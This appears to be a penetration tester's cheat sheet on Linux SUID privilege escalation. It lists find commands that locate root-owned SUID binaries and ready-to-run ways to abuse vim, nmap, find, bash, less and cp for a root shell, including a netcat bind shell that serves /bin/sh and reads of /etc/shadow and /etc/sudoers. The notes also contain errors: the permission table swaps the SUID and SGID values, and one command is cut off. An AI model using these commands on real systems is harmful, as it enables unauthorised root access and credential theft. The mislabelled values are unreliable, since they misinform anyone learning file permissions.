SUID NOTES

SUID NOTES

VALUES

1000 = Sticky Bit

2000 = SUID

4000 = GUID


========================================

|  FIND COMMANDS THAT ARE EXPLOITABLE     |

========================================

find / -user root -perm -4000 -exec ls -ldb {} \;

or

find / -user root -perm -4000 -print 2>/dev/null

find / -perm +2000 -user root -type f -print



========================================

|              EXPLOIT THOSE COMMANDS                 |

========================================

VIM:

---------------------------------------

vim.tiny /etc/shadow

vim.tiny

# Press ESC key

:set shell=/bin/sh

:shell

vim.basic /root/.bashrc

(Create a ROOT shell)

vim.basic /etc/sudoers

(Reads file as ROOT)

---------------------------------------

NMAP:                                       |

---------------------------------------

nmap --interactive



---------------------------------------

FIND:                                        |

---------------------------------------

touch pentestlab

find pentestlab -exec whoami \;

find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;

Connecting into the opened port will give a root shell.

----------------------------------------------------------

netcat 192.168.1.189 5555

id

cat /etc/sh



---------------------------------------

BASH:                                        |

---------------------------------------

bash -p



---------------------------------------

LESS:                                        |

---------------------------------------

less /etc/passwd

!/bin/sh



---------------------------------------

CP:                                          |

---------------------------------------

which cp

ls -al /bin/cp

chmod u+s /bin/cp